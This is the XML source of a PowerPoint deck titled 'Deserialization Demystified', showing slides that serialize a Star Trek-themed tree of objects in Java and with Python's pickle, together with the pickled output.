              <a:t> La Forge");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Node e = new Node("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Worf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Node f = new Node("Miles O'Brien");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a.addChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(b);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a.addChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(c);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a.addChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(d);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.addChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>d.addChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(f);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FileOutputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fOut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FileOutputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javaorg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ObjectOutputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> out = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ObjectOutputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fOut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>out.writeObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>out.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	} </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       catch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IOException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>System.out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()); }	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15512064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Serialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</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2463" y="1393212"/>
            <a:ext cx="6131356" cy="4390971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15283637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‘Pickling’ a Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1388817" y="1356721"/>
            <a:ext cx="2294626" cy="4537494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="dk1">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk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sz="1200" dirty="0"/>
              <a:t>import pickle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>class Node(object):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>__(self, data):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>self.data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>self.children</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>add_child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(self, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>self.children.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>a = Node('Jean-Luc Picard')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>b = Node('William Riker')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>c = Node('Tasha </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Yar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>d = Node('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Geordi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> La Forge')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>e = Node('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Worf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>f = Node('Miles O\'Brien')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>a.add_child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(b)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>a.add_child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(c)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>a.add_child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(d)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>c.add_child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(e)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>d.add_child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>pickle.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(a)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689720" y="1367135"/>
            <a:ext cx="1452270" cy="4537494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="dk1">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ccopy_reg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reconstructor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c__main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>__</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Node</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>builtin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>__</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ntp3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rp4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(dp5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>S'data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>S'Jean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Luc Picard'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sS'children</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(lp9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>g0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(g1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>g2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ntp10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rp11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239519" y="1367135"/>
            <a:ext cx="1452270" cy="4537494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="dk1">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk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sz="1200" dirty="0" smtClean="0"/>
              <a:t>[…CONTINUED]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(dp12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>g6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>S'William</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Riker'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>p13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>sg8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(lp14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>sbag0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(g1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>g2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Ntp15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Rp16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(dp17</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>g6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>S'Tasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Yar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>p18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>sg8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(lp19</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>g0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(g1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>g2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Ntp20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71274942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1474</TotalTime>
  <Words>2367</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>457</Paragraphs>
  <Slides>33</Slides>
  <Notes>23</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Office Theme</vt:lpstr>
      <vt:lpstr>Deserialization Demystified</vt:lpstr>
      <vt:lpstr>whoami</vt:lpstr>
      <vt:lpstr>Serialization – What is it?</vt:lpstr>
      <vt:lpstr>We Typically Think of…</vt:lpstr>
      <vt:lpstr>Think Transporter</vt:lpstr>
      <vt:lpstr>Serializing an Org chart</vt:lpstr>
      <vt:lpstr>Serializing a Java class</vt:lpstr>
